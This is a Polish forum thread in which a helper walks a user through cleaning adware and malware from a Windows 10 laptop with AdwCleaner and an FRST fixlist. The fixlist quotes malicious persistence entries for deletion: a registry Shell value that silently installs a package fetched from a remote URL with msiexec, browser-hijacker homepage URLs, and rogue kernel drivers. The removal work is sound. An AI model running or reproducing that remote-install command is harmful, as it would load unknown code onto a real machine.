Ogólne problemy z WIN 10, błąd aktualizacji


(Aga8212) #1

Witam
Po włączeniu komputera system zaczyna instalować aktualizację, a później zaczyna wycofywać ją i podaje komunikat:
“Nie można ukończyć instalacji aktualizacji. Wycofywanie zmian. Nie wyłączaj komputera.”

Nadmieniam, że w ostatnim czasie miałam problemy z luncherem gry Revelation, który nie mógł zalogować mnie do gry przy użyciu “Login with Facebook”. Support zasugerował wyłączenie programu antywirusowego (McAfee). W efekcie odinstalowałam go.
Przy okazji nie można otwierać linków z programów (jak ktoś wyśle) TeamSpeak 3, Skype.
Czy mój komputer może być zawirusowany? McAfee nie zgłaszał problemów. Pliki z kwarantanny przed odinstalowaniem zostały usunięte.
Proszę o pomoc i działanie diagnostyczne w celu przywrócenia sprawności mojego laptopa.

Poniżej zamieszczam kolejne linki do raportów FRST:

  1. FRST.txt ===> http://www.wklej.org/id/3238562/
  2. Addition.txt ===> http://www.wklej.org/id/3238560/
    (posiadam jeszcze link shortcut.txt, ale nie mogę ich tutaj zamieścić gdyż jestem nowym użytkownikiem z ograniczoną ilością do zamieszczania linków - 2 max)

Cierpliwie czekam na instrukcję. Z góry dziękuję.
Pozdrawiam.


(Atis) #2

W panelu sterowania odinstaluj AlphaGo.

Pobierz i uruchom AdwCleaner Kliknij Skanuj (Scan) i później Oczyść (Clean).

Kliknij Skanuj (Scan) i pokaż nowy raport FRST i Addition.


(Aga8212) #3

Witam,
Przepraszam, że tak późno, ale byłam w pracy.
Poniżej zamieszczam raporty:

  1. Frst.txt ===> http://wklej.org/id/3239094/
  2. Addition.txt ===>http://wklej.org/id/3239095/

Aktualizaja Windows pzebiegła pomyślnie.

Czekam na dalsze instrukcje. Z góry dziękuję.
Pozdrawiam


(Atis) #4

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

HKU\S-1-5-21-233846177-74814840-4216801715-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj81F8VWFTwxF8M3OTE1MWIxMjLSRTI3FTJYMkJXNjYcMq== /q <==== UWAGA
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492580945&z=4a723ca0e9201723bc11fb9gbzatdodwab0e4tbzaw&from=che0812&uid=ST500LT012-1DG142_W3PLBF5JXXXXW3PLBF5J&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496228514&z=ea88fc632fc8be8adce036dg7z3t2q1o9o0b2w5gbw&from=che0812&uid=ST500LT012-1DG142_W3PLBF5JXXXXW3PLBF5J
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492580945&z=4a723ca0e9201723bc11fb9gbzatdodwab0e4tbzaw&from=che0812&uid=ST500LT012-1DG142_W3PLBF5JXXXXW3PLBF5J&q={searchTerms}
HKU\S-1-5-21-233846177-74814840-4216801715-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495438627&z=98895c28b4a905a97b44e31g1zdt2w7z6c4b1q3ccg&from=che0812&uid=ST500LT012-1DG142_W3PLBF5JXXXXW3PLBF5J&q={searchTerms}
HKU\S-1-5-21-233846177-74814840-4216801715-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496228514&z=ea88fc632fc8be8adce036dg7z3t2q1o9o0b2w5gbw&from=che0812&uid=ST500LT012-1DG142_W3PLBF5JXXXXW3PLBF5J
HKU\S-1-5-21-233846177-74814840-4216801715-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495438627&z=98895c28b4a905a97b44e31g1zdt2w7z6c4b1q3ccg&from=che0812&uid=ST500LT012-1DG142_W3PLBF5JXXXXW3PLBF5J&q={searchTerms}
Edge HomeButtonPage: HKU\S-1-5-21-233846177-74814840-4216801715-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493714920&z=28bfc9768ffc675ed24f495g9zet9c7m5g8z2t4g9t&from=ypid&uid=ST500LT012-1DG142_W3PLBF5JXXXXW3PLBF5J
CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=1492580945&z=4a723ca0e9201723bc11fb9gbzatdodwab0e4tbzaw&from=che0812&uid=ST500LT012-1DG142_W3PLBF5JXXXXW3PLBF5J
CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1492580945&z=4a723ca0e9201723bc11fb9gbzatdodwab0e4tbzaw&from=che0812&uid=ST500LT012-1DG142_W3PLBF5JXXXXW3PLBF5J"
CHR DefaultSearchURL: Default -> hxxp://www.mystarting123.com/search/index.php?z=df95482a0b15fe23a535597gfz7t9w0qcgac5t2m9m&q={searchTerms}
CHR DefaultSearchKeyword: Default -> mystarting123
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1496228514&z=ea88fc632fc8be8adce036dg7z3t2q1o9o0b2w5gbw&from=che0812&uid=ST500LT012-1DG142_W3PLBF5JXXXXW3PLBF5J
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA
C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys
C:\Program Files (x86)\Elex-tech
2017-08-18 18:43 - 2017-08-18 18:43 - 000000000 ____D C:\WINDOWS\System32\Tasks\McAfee
2017-08-18 18:29 - 2017-08-18 18:29 - 000000000 ____D C:\ProgramData\USOShared
2017-08-18 14:06 - 2017-08-18 14:11 - 000000000 ____D C:\AdwCleaner
2017-08-15 23:12 - 2015-11-28 00:28 - 000000000 ____D C:\ProgramData\McAfee
2017-08-15 23:12 - 2015-11-28 00:28 - 000000000 ____D C:\Program Files (x86)\McAfee
2017-08-18 19:07 - 2017-08-18 19:07 - 000000000 ____H () C:\ProgramData\6f0d33d1bfa0433c912ca1575cb8a2b0.000a0002
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Brak pliku
Task: {576A2B5F-C07B-4C4B-AF07-2BE84AE10066} - System32\Tasks\{C5E1C50E-17CE-4102-9657-757BE547208C} => "c:\windows\system32\launchwinapp.exe" hxxp://ui.skype.com/ui/0/7.26.80.101/pl/abandoninstall?page=tsProgressBar
Task: {6A6E89C4-4114-46F8-B893-8B0D96357F57} - System32\Tasks\{19E3C05A-7F64-4924-867A-8FE1D04D691E} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\JoWooD\Gothic II\System\Gothic2.exe" -d "C:\Program Files (x86)\JoWooD\Gothic II\System"
Task: {CF6A8A14-260B-4A19-A828-7EFCA548B338} - System32\Tasks\{881E6BC5-8F88-4E97-9769-097B118431DF} => "c:\windows\system32\launchwinapp.exe" hxxp://ui.skype.com/ui/0/7.26.0.101/pl/abandoninstall?page=tsMain
EmptyTemp:

Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.


(Aga8212) #5

Witam,
Wykonałam naprawę i dołączam raport FRST
http://wklej.org/id/3239215/
Z góry dziękuję


(Atis) #6

Skasuj folder C:\FRST
Przeczytaj w jaki sposób należy instalować programy: KLIK
Włącz przywracanie systemu dla dysku systemowego C:
https://www.tenforums.com/tutorials/4533-turn-off-system-protection-drives-windows-10-a.html


(Aga8212) #7

Witam,
Dziękuję za pomoc.
Wszystko jest dobrze z laptopem.
Bardo dziękuję.